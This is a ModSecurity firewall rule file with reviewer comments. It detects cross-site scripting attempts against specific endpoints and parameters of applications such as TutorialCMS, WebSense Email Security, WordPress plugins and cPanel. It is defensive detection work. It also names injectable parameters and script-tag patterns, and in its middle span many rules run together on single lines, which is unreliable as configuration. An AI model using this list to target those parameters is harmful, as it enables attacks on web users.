SecRule REQUEST_LINE "@contains /browseSubCat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003889,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseSubCat.php catFile',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'"
SecRule &TX:'/XSS.*ARGS:catFile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseSubCat.php catFile',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2003890) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- openTutorial.php id
# NOTE(review): &TX:'/XSS.*ARGS:id/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "id" are counted too.
SecRule REQUEST_LINE "@contains /openTutorial.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003890,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- openTutorial.php id',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'"
SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- openTutorial.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003891) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- topFrame.php id
# NOTE(review): same unanchored TX-name count as above, here for "id".
SecRule REQUEST_LINE "@contains /topFrame.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003891,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- topFrame.php id',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'"
SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- topFrame.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- editListing.php id
SecRule REQUEST_LINE "@contains /admin/editListing.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003892,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- editListing.php id',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'"
SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- editListing.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2003893) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- search.php search
# NOTE(review): &TX:'/XSS.*ARGS:search/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "search" are counted too.
# "@contains /search.php" is a generic path, so this application-specific rule
# is evaluated for any application that serves a search.php.
SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003893,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- search.php search',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'"
SecRule &TX:'/XSS.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- search.php search',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004573) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart XSS Attempt -- shopcontent.asp type
SecRule REQUEST_LINE "@contains /shopcontent.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004573,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart XSS Attempt -- shopcontent.asp type',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468834/100/0/threaded'"
SecRule &TX:'/XSS.*ARGS:type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VP-ASP 
Shopping Cart XSS Attempt -- shopcontent.asp type',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2010167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp Queue XSS Attempt
# NOTE(review): &TX:'/XSS.*ARGS:Queue/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "Queue" are counted too.
SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010167,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp Queue XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'"
SecRule &TX:'/XSS.*ARGS:Queue/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp Queue XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2010168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp FileName XSS Attempt
# NOTE(review): same unanchored TX-name count as above, here for "FileName".
SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010168,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp FileName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'"
SecRule &TX:'/XSS.*ARGS:FileName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp FileName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2010169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp IsolatedMessageID XSS Attempt
SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010169,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp IsolatedMessageID XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:IsolatedMessageID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp IsolatedMessageID XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010170) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp ServerName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010170,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp ServerName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:ServerName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp ServerName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010171) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp FileName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010171,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp FileName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:FileName/' "@gt 0" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp FileName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010172) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp IsolatedMessageID XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010172,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp IsolatedMessageID XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:IsolatedMessageID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp IsolatedMessageID XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010173) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp ServerName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010173,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp ServerName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:ServerName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp ServerName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010174) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security 
msgAnalyse.asp Dictionary XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010174,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Dictionary XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:Dictionary/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Dictionary XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010175) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Scoring XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010175,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Scoring XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:Scoring/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Scoring XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010176) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp MessagePart XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010176,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp MessagePart XSS 
Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:MessagePart/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp MessagePart XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010177) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp Queue XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010177,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp Queue XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:Queue/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp Queue XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010178) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp FileName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010178,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp FileName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:FileName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp FileName XSS 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010179) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp IsolatedMessageID XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010179,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp IsolatedMessageID XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:IsolatedMessageID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp IsolatedMessageID XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010180) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp ServerName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010180,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp ServerName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:ServerName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgForwardToRiskFilter.asp ServerName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003916) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WikkaWiki (Wikka Wiki) XSS Attempt -- 
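usersettings.php name
# Chain: the request line contains /usersettings.php AND at least one TX
# variable matching /XSS.*ARGS:name/ exists. On a match the rule adds the
# critical anomaly score and enables audit log part E.
# NOTE(review): the TX selector is an unanchored regex, so 'ARGS:name' also
# selects hits stored for any parameter whose name starts with "name";
# confirm whether an exact parameter name was intended.
SecRule REQUEST_LINE "@contains /usersettings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003916,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WikkaWiki (Wikka Wiki) XSS Attempt -- usersettings.php name',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23894'"
    SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WikkaWiki (Wikka Wiki) XSS Attempt -- usersettings.php name',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004574) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WikyBlog XSS Attempt sessionRegister.php
# Chain: the request line contains /include/sessionRegister.php AND "<" AND
# "script" AND ">".
# The chained checks used to search for the literal strings "| 3C |" and
# "| 3E |". These look like hex byte notation for "<" and ">" (presumably
# carried over from the source signature); @contains compares plain text, so
# those links of the chain could not match a real request line.
# Transformations are listed on every chained rule so that decoding and
# case folding do not depend on SecDefaultAction.
SecRule REQUEST_LINE "@contains /include/sessionRegister.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004574,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WikyBlog XSS Attempt sessionRegister.php',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25308'"
    SecRule REQUEST_LINE "@contains <" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode"
    SecRule REQUEST_LINE "@contains script" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
    SecRule REQUEST_LINE "@contains >" "t:none,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WikyBlog XSS Attempt sessionRegister.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003885) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php
SecRule REQUEST_LINE "@contains /sidebar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003885,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467360/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY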
"(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011006) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/nextgen-gallery/xml/media-rss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011006,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-1186'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/XSS.*ARGS:mode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011107) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-cumulus/tagcloud.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011107,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains mode=tags" "chain" SecRule &TX:'/XSS.*ARGS:tagcloud/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004557) SpiderLabs Research (SLR) Public Vulns: ET 
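WEB_SPECIFIC_APPS @Mail XSS Attempt -- ReadMsg.php
# Chain: the request line contains /ReadMsg.php AND "<" AND "script" AND ">".
# The chained checks used to search for the literal strings "| 3C |" and
# "| 3E |". These look like hex byte notation for "<" and ">" (presumably
# carried over from the source signature); @contains compares plain text, so
# those links of the chain could not match a real request line.
# Transformations are listed on every chained rule so that decoding and
# case folding do not depend on SecDefaultAction.
SecRule REQUEST_LINE "@contains /ReadMsg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004557,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS @Mail XSS Attempt -- ReadMsg.php',tag:'web-application-attack',tag:'cve,CVE-2007-2825'"
    SecRule REQUEST_LINE "@contains <" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode"
    SecRule REQUEST_LINE "@contains script" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
    SecRule REQUEST_LINE "@contains >" "t:none,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS @Mail XSS Attempt -- ReadMsg.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011115) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cPanel fileop Parameter Cross Site Scripting Attempt
# Chain: the request line contains /frontend/x3/files/fileop.html AND at least
# one TX variable matching /XSS.*ARGS:fileop/ exists. On a match the rule adds
# the critical anomaly score and enables audit log part E.
# NOTE(review): the TX selector is an unanchored regex, so it also selects
# hits stored for parameters whose names merely start with "fileop"; confirm
# whether an exact parameter name was intended.
SecRule REQUEST_LINE "@contains /frontend/x3/files/fileop.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011115,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS cPanel fileop Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,37394'"
    SecRule &TX:'/XSS.*ARGS:fileop/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cPanel fileop Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003875) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fotolog XSS Attempt -- all_photos.html user
SecRule REQUEST_LINE "@contains /all_photos.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003875,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS fotolog XSS Attempt -- all_photos.html user',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468316/100/0/threaded'"
    SecRule &TX:'/XSS.*ARGS:user/' "@gt 0"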
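"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fotolog XSS Attempt -- all_photos.html user',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2009671) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS millionpixel payment.php order_id XSS attempt
# Chain: the request line contains /users/payment.php AND an argument name
# matches order_id AND the request line contains "GET ", "<script>" and
# "</script>".
# The two script-tag checks now carry explicit decoding and lowercase
# transformations, so URL-encoded, entity-encoded and mixed-case tags are
# inspected too instead of only the exact raw lowercase form.
# NOTE(review): "(?i:order_id)" is unanchored and matches any argument name
# that contains order_id; "@contains GET " is a substring test on the whole
# request line rather than a check of the method. Confirm both are intended.
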